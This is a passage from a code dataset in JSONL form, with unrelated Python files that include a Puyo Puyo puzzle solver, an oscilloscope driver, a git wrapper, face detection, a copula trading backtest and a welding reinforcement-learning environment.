ind_2.T)\n K[idx] = 1\n return K\n\n\ndef kernel_gaussian(X_in_1, X_in_2, sigma):\n X_in_12 = np.sum(np.power(X_in_1, 2), 0)\n X_in_12 = np.expand_dims(X_in_12, 0)\n X_in_22 = np.sum(np.power(X_in_2, 2), 0)\n X_in_22 = np.expand_dims(X_in_22, 0)\n dist_2 = (X_in_12 + X_in_22.T) - 2 * np.dot(X_in_1.T, X_in_2)\n K = np.exp(-dist_2 / (2 * np.power(sigma, 2)))\n return K\n","sub_path":"pyHSICLasso-master/pyHSICLasso-master/pyHSICLasso/kernel_tools.py","file_name":"kernel_tools.py","file_ext":"py","file_size_in_byte":1299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"382686883","text":"from collections import deque\ndx = [1,0,-1,0]\ndy = [0,1,0,-1]\n\nheight = 12\nwidth = 6\nboard = [ list(input()) for _ in range(height)]\n\n#뿌요 떨어짐\ndef down(board):\n for i in range(height-1,-1,-1):\n for j in range(width):\n x = i\n while True:\n x += 1\n if x >= height or board[x][j] != \".\":\n break\n board[x][j] = board[x-1][j]\n board[x-1][j] = \".\"\n\ndef bfs(i,j,visited,board):\n\n que = deque()\n que.append((i,j))\n points = [[i,j]]\n color = board[i][j]\n \n while que:\n cx,cy = que.popleft()\n\n for i in range(4):\n nx = cx + dx[i]\n ny = cy + dy[i]\n\n if 0 <= nx < height and 0<= ny < width and not visited[nx][ny]:\n if color == board[nx][ny]:\n visited[nx][ny] = True\n que.append((nx,ny))\n points.append((nx,ny))\n\n if len(points) >= 4:\n for x, y in points:\n board[x][y] = \".\"\n return True\n else:\n return False\n\n\n\n#뿌요 연쇄\ndef bomb(board):\n visited = [ [False for _ in range(width)] for _ in range(height) ]\n find = False\n for i in range(height):\n for j in range(width):\n if board[i][j] != \".\" and not visited[i][j]:\n visited[i][j] = True\n if bfs(i,j,visited,board):\n find = True\n return find\n\ncnt = 0\nwhile True:\n down(board)\n if bomb(board):\n cnt+=1\n else:\n print(cnt)\n break\n\n","sub_path":"3.beakjoon/구현/BOJ_11559_뿌요뿌요.py","file_name":"BOJ_11559_뿌요뿌요.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"421531445","text":"from src.Managers.HardwareManager.HardwareDevice import HardwareDevice\nimport niscope, time, numpy as np\nfrom src.Managers.HardwareManager.PacketCommands import *\nfrom src.Managers.HardwareManager.PacketMeasurements import *\n\nms = lambda: int(round(time.time() * 1000))\n\nclass PXIe_5105(HardwareDevice):\n hardwareType = 'NI PXIe-5105'\n hardwareIdentifier = 'MRB_PXIe5105'\n hardwareVersion = '1.0'\n hardwareCreator = 'Matthew R. Brantley & Ian G. M. Anthony'\n hardwareVersionDate = '5/28/2019'\n\n############################################################################################\n##################################### MANDATORY FUNCS ######################################\n def scan(self):\n for device in self.systemDeviceInfo['NI-SCOPE']:\n if(device['Device Model'] == 'NI PXIe-5105'):\n self.Add_Device(device['Device Name'])\n\n self.Add_Trigger_Mode('Software')\n self.Add_Trigger_Mode('Front Digital Trigger')\n self.scanned.emit()\n\n def initialize(self, deviceName, triggerMode):\n self.booting = True\n try:\n if(deviceName != ''):\n self.session = None\n self.wfm_handles = list()\n self.reportTime = ms()\n with niscope.Session(deviceName) as session:\n # Would get more session data here\n self.source0 = self.Add_AISource('0', -10, 10, 0.1)\n self.source1 = self.Add_AISource('1', -10, 10, 0.1)\n self.source2 = self.Add_AISource('2', -10, 10, 0.1)\n self.source3 = self.Add_AISource('3', -10, 10, 0.1)\n self.source4 = self.Add_AISource('4', -10, 10, 0.1)\n self.source5 = self.Add_AISource('5', -10, 10, 0.1)\n self.source6 = self.Add_AISource('6', -10, 10, 0.1)\n self.source7 = self.Add_AISource('7', -10, 10, 0.1)\n\n self.session = niscope.Session(deviceName)\n\n if(triggerMode == 'Front Digital Trigger'):\n self.Add_Digital_Trigger('PFI1')\n except:\n pass\n\n self.initialized.emit()\n\n def configure(self):\n \n self.configured.emit()\n\n def program(self, programmingPackets):\n self.Set_Ready_Status(False)\n if(programmingPackets):\n packet = programmingPackets[0]['programmingPacket'].Get_Commands(commandType=AnalogAcquisitionCommand)\n if packet:\n packet = packet[0]\n if(packet is not None):\n self.session.abort()\n self.session.vertical_range = packet.acqMax-packet.acqMin\n self.session.vertical_coupling = niscope.VerticalCoupling.DC\n self.session.vertical_offset = (packet.acqMin + packet.acqMax) / 2\n self.session.probe_attenuation = 1\n self.session.channels[0].channel_enabled = True\n self.session.channels[1].channel_enabled = False\n self.session.channels[2].channel_enabled = True\n self.session.channels[3].channel_enabled = False\n self.session.channels[4].channel_enabled = False\n self.session.channels[5].channel_enabled = False\n self.session.channels[6].channel_enabled = False\n self.session.channels[7].channel_enabled = False\n\n self.session.input_clock_source = 'PXI_CLK10'\n self.session.min_sample_rate = packet.rate\n self.session.horz_min_num_pts = packet.noSamples\n self.session.horz_record_ref_position = 0\n self.session.horz_num_records = 1\n self.session.horz_enforce_realtime = True\n\n self.session.trigger_type = niscope.TriggerType.EDGE\n self.session.trigger_level = 2.0\n self.session.trigger_source = '0' \n\n self.readArray = np.ndarray(packet.noSamples, dtype=np.float64)\n\n self.Send_Status_Message('Progam Rate (Hz): ' + str(packet.rate))\n self.Send_Status_Message('Real Rate (Hz): ' + str(self.session.horz_sample_rate))\n\n self.booting = False\n self.Set_Ready_Status(True)\n self.programmed.emit()\n\n def softTrigger(self):\n self.Set_Ready_Status(False)\n self.session.initiate()\n \n self.softTriggered.emit()\n\n def shutdown(self):\n if(self.session is not None):\n self.session.close()\n\n def idle(self):\n if(hasattr(self, 'session')):\n if(self.session is not None):\n try:\n if(not self.booting):\n if(self.session.acquisition_status() == niscope.AcquisitionStatus.COMPLETE):\n if(self.Ready_Status() is False):\n self.Send_Status_Message('Triggered!')\n wfmInfo = self.session.channels[2].fetch_into(self.readArray)\n self.writeToPacket(self.readArray, wfmInfo[0])\n self.session.abort()\n self.Set_Ready_Status(True)\n\n else:\n if(ms() - self.reportTime >= 500):\n self.Send_Status_Message('Armed! Waiting for trigger...')\n self.reportTime = ms()\n except:\n pass\n \n def stop(self):\n self.Send_Status_Message('Sending Stop Command...')\n if(hasattr(self, 'session')):\n if(self.session is not None):\n try:\n self.session.abort()\n except:\n pass\n\n############################################################################################\n###################################### INTERNAL FUNCS ######################################\n\n def writeToPacket(self, nparray, wfmInfo):\n mPack = measurementPacket()\n measurement = AnalogWaveformMeasurement(wfmInfo.absolute_initial_x, 1/wfmInfo.x_increment, nparray)\n mPack.Add_Measurement(measurement)\n self.Push_Measurements_Packet(self.source2, mPack)\n","sub_path":"Hardware Drivers/PXIe_5105.py","file_name":"PXIe_5105.py","file_ext":"py","file_size_in_byte":6362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"546968485","text":"import pyautogui\nfrom PIL import Image, ImageGrab\n\ndef press(key):\n pyautogui.keyDown(key)\n return\n\ndef detection(picinfo):\n \n # Draw a square to detect night\n for i in range(600,610):\n for j in range(600,610):\n if picinfo[i, j] > 150: time = \"day\"\n if picinfo[i, j] < 150: time = \"night\"\n \n # Draw the rectangle for cactus\n for x in range(150, 390):\n for y in range(375, 450):\n if time == \"day\":\n if picinfo[x, y] < 86:\n press(\"space\")\n return\n if time == \"night\":\n if picinfo[x, y] > 86:\n press(\"space\")\n return\n\nimport time\ntime.sleep(4)\n\nwhile True:\n image = ImageGrab.grab().convert('L') \n picinfo = image.load()\n detection(picinfo)\n \n '''\n # Draw the rectangle for cactus\n for x in range(150, 390):\n for y in range(375, 450):\n picinfo[x, y] = 86\n \n # Draw blank space to detect night\n for i in range(600,610):\n for j in range(600,610):\n picinfo[i, j] = 86\n \n image.show()\n break'''\n","sub_path":"Others/My Projects/Google Dino Game/full.py","file_name":"full.py","file_ext":"py","file_size_in_byte":1172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"433583091","text":"import urllib.request\nimport time\n\nclass mobio:\n def CheckCode(self,servId,code):\n\n self.servId = servId\n self.code = code\n\n request = urllib.request.urlopen(\"http://www.mobio.bg/code/checkcode.php?servID={0}&code={1}\".format(self.servId,self.code))\n answer = request.read()\n reader = answer.decode(\"utf8\")\n request.close()\n \n if request:\n if reader == \"PAYBG=OK\":\n return 1\n else:\n return 0\n else:\n return 0\n","sub_path":"src/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"137232333","text":"import math\n\n# What is the smallest value of n such that an algorithm whose running time is 100n^2\n# runs faster than an algorithm whose running time is 2^n on the same machine?\n\nn = 1\nrt1 = 100 * (n ** 2)\nrt2 = 2 ** n\nwhile (rt1 >= rt2):\n print(\"n: {}, 100n^2 rt: {}, 2^2n rt: {}\".format(n, rt1, rt2))\n n += 1\n rt1 = 100 * (n ** 2)\n rt2 = 2 ** n\n\n# Answer: The answer is 14 after that it's the first algorithm always performs better than the second. \n","sub_path":"Foundations/running_times(1.2-3).py","file_name":"running_times(1.2-3).py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"375634898","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\nfrom pygit2 import Repository\nfrom pygit2 import GIT_OBJ_TAG\nfrom pygit2 import GIT_OBJ_BLOB\nfrom pygit2 import GIT_OBJ_TREE\nfrom pygit2 import GIT_OBJ_COMMIT\nfrom pygit2 import GIT_DIFF_IGNORE_WHITESPACE\n\nfrom utils import JagareError\nfrom utils.git import format_blob\nfrom utils.git import format_tree\nfrom utils.git import format_commit\nfrom utils.git import format_tag\nfrom utils.git import format_blame\nfrom utils.git import format_diff\nfrom utils.git import _resolve_version\nfrom utils.git import _resolve_type\nfrom utils.process import call, call2, _shlex_split\nfrom tree import ls_tree\nfrom rev_list import rev_list\nfrom rename import detect_renamed\nfrom tag import list_tags\nfrom commit import create_commit\nfrom diff import diff\nfrom ref import update_ref\nfrom clone import clone_repository\nfrom clone import update_server_info\nfrom init import init_repository\nfrom archive import archive_repository\n\n\nclass Jagare(object):\n ''' pygit2 and git commands wrapper '''\n\n def __init__(self, path):\n self.repository = repository(path)\n self.repository_name = None\n\n @property\n def empty(self):\n return self.repository.is_empty\n\n @property\n def bare(self):\n return self.repository.is_bare\n\n @property\n def branches(self):\n return self.list_branches()\n\n @property\n def tags(self):\n return self.list_tags(name_only=True)\n\n def list_tags(self, *w, **kw):\n return list_tags(self.repository, *w, **kw)\n\n def list_branches(self):\n branches = self.repository.listall_branches()\n return branches\n\n def show(self, ref):\n try:\n obj = self.repository.revparse_single(ref)\n except KeyError:\n return {}\n obj_type = obj.type\n\n if obj_type == GIT_OBJ_COMMIT:\n return format_commit(ref, obj, self.repository)\n elif obj_type == GIT_OBJ_TAG:\n return format_tag(ref, obj, self.repository)\n elif obj_type == GIT_OBJ_TREE:\n return format_tree(ref, obj, self.repository)\n elif obj_type == GIT_OBJ_BLOB:\n return format_blob(ref, obj, self.repository)\n\n def ls_tree(self, ref, path=None, recursive=False, size=None, with_commit=False):\n return ls_tree(self.repository, ref, req_path=path,\n recursive=recursive, size=size, with_commit=with_commit)\n\n def rev_list(self, *w, **kw):\n commits = []\n try:\n commits = rev_list(self.repository, *w, **kw)\n except KeyError:\n # FIXME: use JagareError\n pass\n return commits\n\n def blame(self, ref, path, lineno=None):\n if lineno:\n result = call(self.repository,\n 'blame -L %s,%s --porcelain %s -- %s' % (\n lineno, lineno, ref, path))\n else:\n result = call(self.repository,\n 'blame -p -CM %s -- %s' % (ref, path))\n result = format_blame(result['stdout'], self.repository)\n return self.show(ref), result\n\n def format_patch(self, ref, from_ref=None):\n if from_ref:\n result = call(self.repository, 'format-patch --stdout %s...%s' % (from_ref, ref))\n else:\n result = call(self.repository, 'format-patch -1 --stdout %s' % ref)\n return result['stdout']\n\n def detect_renamed(self, ref, path=None):\n return detect_renamed(self.repository, ref)\n\n def commit_file(self, *w, **kw):\n return create_commit(self.repository, *w, **kw)\n\n def diff(self, *w, **kw):\n ''' Jagare's diff wrapper '''\n try:\n kws = {}\n ignore_space = kw.get('ignore_space', None)\n if ignore_space:\n flags = kw.get('flags', 0)\n flags |= GIT_DIFF_IGNORE_WHITESPACE\n kws.update({'flags': flags})\n from_ref = kw.get('from_ref', None)\n if from_ref:\n kws.update({'from_ref': from_ref})\n context_lines = kw.get('context_lines', None)\n if context_lines:\n kws.update({'context_lines': context_lines})\n path = kw.get('path', None)\n paths = kw.get('paths', None)\n if path:\n kws.update({'paths': [path]})\n if paths:\n kws.update({'paths': paths})\n # call diff\n d = diff(self.repository, *w, **kws)\n rename_detection = kw.get('rename_detection', None)\n if rename_detection:\n d['diff'].find_similar()\n #d.find_similar()\n # return formated diff dict\n return format_diff(d)\n except JagareError:\n return []\n\n def resolve_commit(self, version):\n version = version.strip()\n return _resolve_version(self.repository, version)\n\n def resolve_type(self, version):\n version = version.strip()\n return _resolve_type(self.repository, version)\n\n def clone(self, path, bare=None, branch=None, mirror=None, env=None):\n # TODO: check clone result\n clone_repository(self.repository.path, path,\n bare=bare, checkout_branch=branch,\n mirror=mirror, env=env)\n jagare = Jagare(path)\n if bare:\n update_server_info(jagare.repository)\n return jagare\n\n @classmethod\n def mirror(cls, url, path, bare=None, branch=None, env=None):\n # TODO: check clone result\n clone_repository(url, path,\n bare=bare, checkout_branch=branch,\n mirror=True, env=env)\n jagare = Jagare(path)\n if bare:\n update_server_info(jagare.repository)\n return jagare\n\n @classmethod\n def init(cls, path, work_path=None, bare=None):\n # TODO: move to libs\n # if parent dir not exist, create it.\n # else git init will fail\n if not os.path.exists(path):\n os.makedirs(path)\n init_repository(path, work_path=work_path, bare=bare)\n return cls(path)\n\n def revparse_single(self, *w, **kw):\n try:\n return super(GitRepository, self).revparse_single(*w, **kw)\n except (KeyError, ValueError):\n raise JagareError(\"rev not found.\")\n\n def listall_references(self):\n return self.repository.listall_references()\n\n def lookup_reference(self, *w, **kw):\n return self.repository.lookup_reference(*w, **kw)\n\n def read(self, *w, **kw):\n try:\n return super(GitRepository, self).read(*w, **kw)\n except ValueError:\n raise JagareError(\"sha not found\")\n\n def add_remote(self, name, url):\n self.repository.create_remote(name, url)\n\n def update_ref(self, ref, newvalue):\n return update_ref(self.repository, ref, newvalue)\n\n def sha(self, rev='HEAD'):\n return _resolve_version(self.repository, rev)\n\n def merge_base(self, to_sha, from_sha):\n return self.repository.merge_base(to_sha, from_sha)\n\n def remotes(self):\n return self.repository.remotes\n\n def fetch_all(self):\n for remote in self.remotes():\n remote.fetch()\n\n def fetch(self, name):\n target = ''\n for remote in self.remotes():\n if remote.name == name:\n target = remote\n if target:\n target.fetch()\n\n def merge(self, ref, msg='automerge', commit_msg='', no_ff=False, _raise=True, _env=None):\n cmd = ['merge', ref]\n if msg:\n cmd.append('-m')\n cmd.append(msg)\n if commit_msg:\n cmd.append('-m')\n cmd.append(commit_msg)\n if no_ff:\n cmd.append('--no-ff')\n errcode = call(self.repository, cmd, env=_env)\n return errcode\n\n def push(self, remote, ref):\n cmd = ['push', remote, ref]\n errcode = call(self.repository, cmd)\n return errcode\n\n def archive(self, prefix):\n result = archive_repository(self.repository.path, prefix)\n return result['stdout']\n\n def delete_branch(self, name):\n branch = self.repository.lookup_branch(name)\n if branch:\n branch.delete()\n\n\ndef repository(path):\n try:\n repo = Repository(path)\n except KeyError:\n raise JagareError('repo %s not exists' % path)\n return repo\n","sub_path":"ellen/repo.py","file_name":"repo.py","file_ext":"py","file_size_in_byte":8442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"143879026","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\n# Version: 1.0\n# Author: jtahstu\n# Contact: root@jtahstu.com\n# Site: blog.jtahstu.com\n# Software: PyCharm\n# Time: 2018/8/24 10:16\n\ndef singleNumber(nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n res = {}\n for k, v in enumerate(nums):\n if v in res:\n res[v] += 1\n else:\n res[v] = 1\n for (k, v) in res.items():\n if v == 1:\n return k\n\n # return sum(list(set(nums))) * 2 - sum(nums)\n\n # n = 0\n # for num in nums:\n # n ^= num\n # return n\n\ndef init():\n l = [4, 1, 2, 1, 2]\n print(singleNumber(l))\n\n\nif __name__ == '__main__':\n init()\n","sub_path":"2018/leetcode/single-number.py","file_name":"single-number.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"567198163","text":"\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n# Make a 9x9 grid...\nnrows, ncols = 21,21\nimage = np.zeros((nrows,ncols))\n\n\nfor i in range(7):\t\n\timage[2:nrows-2,3*i+1] =np.ones((ncols-4,))\n\n\nrow_labels = range(nrows)\ncol_labels = range(ncols)\nplt.matshow(image)\nplt.xticks(range(ncols), col_labels)\nplt.yticks(range(nrows), row_labels)\nplt.show()","sub_path":"mapa.py","file_name":"mapa.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"124629785","text":"import cv2 as cv\n\n# Function to apply the captured frame to the classifiers and draw ROIs where detections are made.\ndef detect_faces_and_eyes(frame):\n frame_gray = cv.cvtColor(frame, cv.COLOR_BGR2GRAY)\n frame_gray = cv.equalizeHist(frame_gray)\n\n face_line_color = (0, 255, 0)\n face_line_type = cv.LINE_4\n\n eye_line_color = (0, 0, 255)\n eye_line_type = cv.LINE_4\n\n # Detect faces\n faces = face_cascade.detectMultiScale(frame_gray)\n\n for (x, y, w, h) in faces:\n top_left = (x, y)\n bottom_right = (x + w, y + h)\n\n # Draw face ROI\n frame = cv.rectangle(frame, top_left, bottom_right, face_line_color, lineType=face_line_type)\n faceROI = frame_gray[y:y+h, x:x+w]\n\n # Detect eyes within detected face\n eyes = eyes_cascade.detectMultiScale(faceROI)\n for (x2, y2, w2, h2) in eyes:\n eye_top_left = (x+x2, y+y2)\n eye_bottom_right = (x+x2 + w2, y+y2 + h2)\n\n # Draw eye ROI\n frame = cv.rectangle(frame, eye_top_left, eye_bottom_right, eye_line_color, lineType=eye_line_type)\n\n cv.imshow('Capture - Face detection', frame)\n\n\n# Initialise Face Cascade\nface_cascade = cv.CascadeClassifier('haarcascades/haarcascade_frontalface_alt.xml')\n\n# Initialise Eye Cascade\neyes_cascade = cv.CascadeClassifier('haarcascades/haarcascade_eye_tree_eyeglasses.xml')\n\n# Capture from camera\ncap = cv.VideoCapture(0)\n\nif not cap.isOpened:\n print('ERROR: Cannot open video capture.')\n exit(0)\n\nwhile True:\n ret, frame = cap.read()\n\n if frame is None:\n print(\"WARNING: No frame captured.\")\n break\n\n detect_faces_and_eyes(frame)\n\n if cv.waitKey(10) == 27:\n break","sub_path":"task2.py","file_name":"task2.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"462065213","text":"import pandas as pd\nimport numpy as np\nimport sys\nimport random\nfrom STRATEGY.BaseTradeEngine import BaseTradeEngine\nfrom statsmodels.distributions.empirical_distribution import ECDF\nfrom statsmodels.regression.rolling import RollingOLS\nfrom scipy import stats\nfrom scipy.optimize import minimize\nfrom scipy import integrate as ig\n\ndef get_src_cls(source_name):\n return getattr(sys.modules[__name__], source_name)\n\nclass Copula(BaseTradeEngine):\n \n def __init__(self, *args, **kwargs):\n super(Copula, self).__init__(*args, **kwargs)\n \n # Run a backtest with given parameter inputs\n def process(self, windowOLS = 150, copula_lookback = 150, recalibrate_n = 50, \n cap_CL = 0.95, floor_CL = 0.05, lag = 0, rounding = 3, resample = 1, train_rng = [0,1], **kwargs):\n \n minWindowOLS = int(min(max(windowOLS/np.sqrt(resample),10),len(self.original_x)/2))\n \n minCopula = int(min(max(copula_lookback/np.sqrt(resample),recalibrate_n),len(self.original_x)/2))\n minRecalib = int(max(recalibrate_n/np.sqrt(resample),5))\n \n # Calibrate OLS if necessary\n if minCopula != self.copula_lookback or minRecalib != self.recalibrate_n \\\n or minWindowOLS != self.windowOLS or resample != self.resample:\n self.resampling(resample)\n self.calibrate(minWindowOLS,minCopula,minRecalib)\n self.resample = resample\n \n # Get start and end time for data\n start_hist, end_hist = self.get_indices(train_rng)\n \n #In any case, start data after enough data gathered for the OLS window\n min_start = (max(minWindowOLS,minCopula)-1) / len(self.x) \n train_rng[0] = max(train_rng[0],min_start)\n \n subsamples = [self.buy_x , self.buy_y, self.sell_x, self.sell_y, self.beta, \\\n self.timestamp, self.MI_u_v, self.MI_v_u]\n \n [buy_x, buy_y, sell_x, sell_y, beta, time, MI_u_v, MI_v_u] = \\\n self.get_sample(start_hist, end_hist, *subsamples)\n \n parameters = {'beta': beta, 'floor_CL':floor_CL , 'cap_CL': cap_CL,\n 'lag': lag, 'rounding': rounding, 'MI_u_v': MI_u_v, 'MI_v_u': MI_v_u}\n \n parameters.update(kwargs)\n \n # Create the record\n self.record = self.backtest(buy_x, buy_y, sell_x, sell_y, time, **parameters)\n \n # Legacy\n self.reward = sum(self.record.port_rets)\n \n \n def calibrate(self, windowOLS, copula_lookback, recalibrate_n, **kwargs):\n self.windowOLS = int(windowOLS)\n self.copula_lookback = int(copula_lookback)\n self.recalibrate_n = int(recalibrate_n)\n \n df = pd.DataFrame({'y':self.y,'x':self.x,'c':1})\n \n model = RollingOLS(endog =df['y'], exog=df['x'],window=self.windowOLS)\n rres = model.fit()\n \n self.beta = rres.params['x'].values.reshape(-1, )\n \n # Copula decision:\n df['x_log_ret']= np.log(df.x) - np.log(df.x.shift(1))\n df['y_log_ret']= np.log(df.y) - np.log(df.y.shift(1))\n \n # Convert the two returns series to two uniform values u and v using the empirical distribution functions\n ecdf_x, ecdf_y = ECDF(df.x_log_ret), ECDF(df.y_log_ret)\n u, v = [ecdf_x(a) for a in df.x_log_ret], [ecdf_y(a) for a in df.y_log_ret]\n \n # Compute the Akaike Information Criterion (AIC) for different copulas and choose copula with minimum AIC\n tau = stats.kendalltau(df.x_log_ret, df.y_log_ret)[0] # estimate Kendall'rank correlation\n AIC ={} # generate a dict with key being the copula family, value = [theta, AIC]\n\n for i in ['clayton', 'frank', 'gumbel']:\n param = self._parameter(i, tau)\n lpdf = [self._lpdf_copula(i, param, x, y) for (x, y) in zip(u, v)]\n # Replace nan with zero and inf with finite numbers in lpdf list\n lpdf = np.nan_to_num(lpdf) \n loglikelihood = sum(lpdf)\n AIC[i] = [param, -2 * loglikelihood + 2]\n # Choose the copula with the minimum AIC\n copula = min(AIC.items(), key = lambda x: x[1][1])[0]\n \n self.startIdx = copula_lookback + 1 # Because first is NAN\n \n df['MI_u_v'] = 0.5\n df['MI_v_u'] = 0.5\n \n for i in np.arange(self.startIdx , len(df)-recalibrate_n, recalibrate_n):\n \n window = range(i - copula_lookback, i) \n predWindow = range(i, i + recalibrate_n)\n \n x_hist = df.x_log_ret.iloc[window]\n y_hist = df.y_log_ret.iloc[window]\n x_forw = df.x_log_ret.iloc[predWindow]\n y_forw = df.y_log_ret.iloc[predWindow]\n \n # Estimate Kendall'rank correlation\n tau = stats.kendalltau(x_hist, y_hist)[0] \n\n # Estimate the copula parameter: theta\n theta = self._parameter(copula, tau)\n\n # Simulate the empirical distribution function for returns of selected trading pair\n ecdf_x, ecdf_y = ECDF(x_hist), ECDF(y_hist) \n\n # Now get future values\n a, b = self._misprice_index(copula, theta, ecdf_x(x_forw), ecdf_y(y_forw))\n \n df.MI_u_v.iloc[predWindow] = a\n df.MI_v_u.iloc[predWindow] = b\n \n self.MI_u_v = df.MI_u_v\n self.MI_v_u = df.MI_v_u\n \n \n def calculate_hr(self, record, beta, rounding, **kwargs):\n record['hr'] = beta.round(int(rounding))\n return record\n \n def calculate_signals(self, record, MI_u_v, MI_v_u, lag, **kwargs):\n \n record['MI_u_v'] = MI_u_v.values\n record['MI_v_u'] = MI_v_u.values \n \n return record\n \n \n def calculate_thresholds(self, record, cap_CL, floor_CL, **kwargs):\n record['cap'] = cap_CL\n record['floor'] = floor_CL\n return record\n \n def calculate_entry_exit(self, record):\n \n record['long_entry'] = (record.MI_u_v > record.cap) & (record.MI_v_u < record.floor)\n record['long_exit'] = (record.MI_v_u > (record.cap -0.1)) & (record.MI_u_v < (record.floor + 0.1))\n record['long_exit'][-1] = True\n \n # Set up num units short\n record['short_entry'] = (record.MI_v_u > record.cap) & (record.MI_u_v < record.floor)\n record['short_exit'] = (record.MI_u_v > (record.cap -0.1)) & (record.MI_v_u < (record.floor+0.1))\n record['short_exit'][-1] = True\n \n #shift n down\n #for i in range(5):\n # record['long_entry'] = record['long_entry'] | record['long_entry'].shift(i)\n # record['short_entry'] = record['short_entry'] | record['short_entry'].shift(i)\n \n return record\n \n def _parameter(self, family, tau):\n ''' Estimate the parameters for three kinds of Archimedean copulas\n according to association between Archimedean copulas and the Kendall rank correlation measure\n '''\n\n if family == 'clayton':\n return 2 * tau / (1 - tau)\n\n elif family == 'frank':\n\n '''\n debye = quad(integrand, sys.float_info.epsilon, theta)[0]/theta is first order Debye function\n frank_fun is the squared difference\n Minimize the frank_fun would give the parameter theta for the frank copula \n ''' \n integrand = lambda t: t / (np.exp(t) - 1) # generate the integrand\n frank_fun = lambda theta: ((tau - 1) / 4.0 -(ig.quad(integrand, sys.float_info.epsilon, theta)[0] \\\n / theta - 1) / theta) ** 2\n\n return minimize(frank_fun, 4, method='BFGS', tol=1e-5).x \n\n elif family == 'gumbel':\n return 1 / (1 - tau)\n\n def _lpdf_copula(self, family, theta, u, v):\n\n if family == 'clayton':\n pdf = (theta + 1) * ((u ** (-theta) + v ** (-theta) - 1) ** (-2 - 1 / theta)) *\\\n (u ** (-theta - 1) * v ** (-theta - 1))\n\n elif family == 'frank':\n num = -theta * (np.exp(-theta) - 1) * (np.exp(-theta * (u + v)))\n denom = ((np.exp(-theta * u) - 1) * (np.exp(-theta * v) - 1) + (np.exp(-theta) - 1)) ** 2\n pdf = num / denom\n\n elif family == 'gumbel':\n A = (-np.log(u)) ** theta + (-np.log(v)) ** theta\n c = np.exp(-A ** (1 / theta))\n pdf = c * (u * v) ** (-1) * (A ** (-2 + 2 / theta)) * ((np.log(u) * np.log(v)) \\\n ** (theta - 1)) * (1 + (theta - 1) * A ** (-1 / theta))\n return np.log(pdf)\n\n def _misprice_index(self, family, theta, u, v):\n\n if family == 'clayton':\n MI_u_v = v**(-theta-1) * (u**(-theta)+v**(-theta)-1)**(-1/theta-1) # P(U RS_MAX:\n # self.Rs = RS_MIN\n # elif self.Rs < RS_MIN:\n # self.Rs = RS_MAX\n\n # action is to revise the pid control with the DDPG method\n #self.Rs += learning_rate * action[0]\n #self.Ws -= learning_rate * action[1]\n # if self.Rs > 8 or self.Rs < 3 or self.Ws > 15 or self.Ws < 5:\n # self.Rs = np.random.uniform(3, 8, size=1)\n # self.Ws = np.random.uniform(5, 15, size=1)\n self.Rs = np.clip(self.Rs, 3, 8)\n self.Ws = np.clip(self.Ws, 5, 15)\n # update the history of Rs\n # index = int(self.counter % mylstm.TIMESTEPS)\n # print(index)\n self.Rs_list.append(self.Rs[0]) ## wrong ???\n self.Ws_list.append(self.Ws[0])\n # model\n # self.H_prediction = - self.Rs * 1.62 + self.Ws * 0.9 + 11.6\n # if self.counter < mylstm.TIMESTEPS:\n # self.H_prediction = 0\n # else:\n #\n self.H_prediction = mylstm.welding_pred(self.Rs_list[-mylstm.TIMESTEPS:], self.Ws_list[-mylstm.TIMESTEPS:])\n print(self.Rs_list[-1 : ], self.Ws_list[-1 : ], self.H_prediction, self.target)\n\n # reward\n if abs(self.target - self.H_prediction) < 0.05:\n self.on_goal += 1\n r = 1\n if self.on_goal > 80:\n done = True\n else:\n r = 1 / (1 + np.exp(abs(self.target - self.H_prediction))) - 0.5\n self.on_goal = 0\n # state\n s = np.hstack((self.error , self.del_error, self.Rs, self.Ws))\n #print(s,r)\n return s, r, done\n\n # set the initilize values\n def reset(self):\n self.error = 0\n self.del_error = 0\n self.error_last = 0\n self.Rs = 3\n self.Ws = 15\n #self.Wf = 10\n self.H_prediction = np.random.uniform(low=H_MIN, high=H_MAX, size=1)\n self.target = np.random.uniform(low=H_MIN, high=H_MAX, size=1)\n # self.target = 7.5\n # self.H_prediction = 5.5\n #s = np.concatenate((self.error, self.del_error, self.Rs))\n s = np.hstack((self.error, self.del_error, self.Rs, self.Ws))\n return s\n\n\n def render(self):\n if self.viewer is None:\n self.viewer = Viewer(self.H_prediction, self.target)\n\n self.viewer.render(self.H_prediction, self.target)\n\n def sample_action(self):\n return np.random.rand(2) - 0.5\n\n\n\nclass Viewer(pyglet.window.Window):\n\n def __init__(self, Y_t, goal):\n # vsync=False to not use the monitor FPS, we can speed up training\n super(Viewer, self).__init__(width=400, height=400, resizable=False, caption='Arm', vsync=False)\n pyglet.gl.glClearColor(1, 1, 1, 1)\n self.Y_t = Y_t\n # print(\"init\")\n self.goal_info = goal\n\n self.batch = pyglet.graphics.Batch() # display whole batch at once\n self.goal = self.batch.add(\n 4, pyglet.gl.GL_QUADS, None, # 4 corners\n ('v2f', [100, 100 + self.goal_info, # location\n 100, 105 + self.goal_info,\n 300, 105 + self.goal_info,\n 300, 100 + self.goal_info]),\n ('c3B', (86, 109, 249) * 4)) # color\n self.arm1 = self.batch.add(\n 4, pyglet.gl.GL_QUADS, None,\n ('v2f', [250, 250, # location\n 250, 255,\n 255, 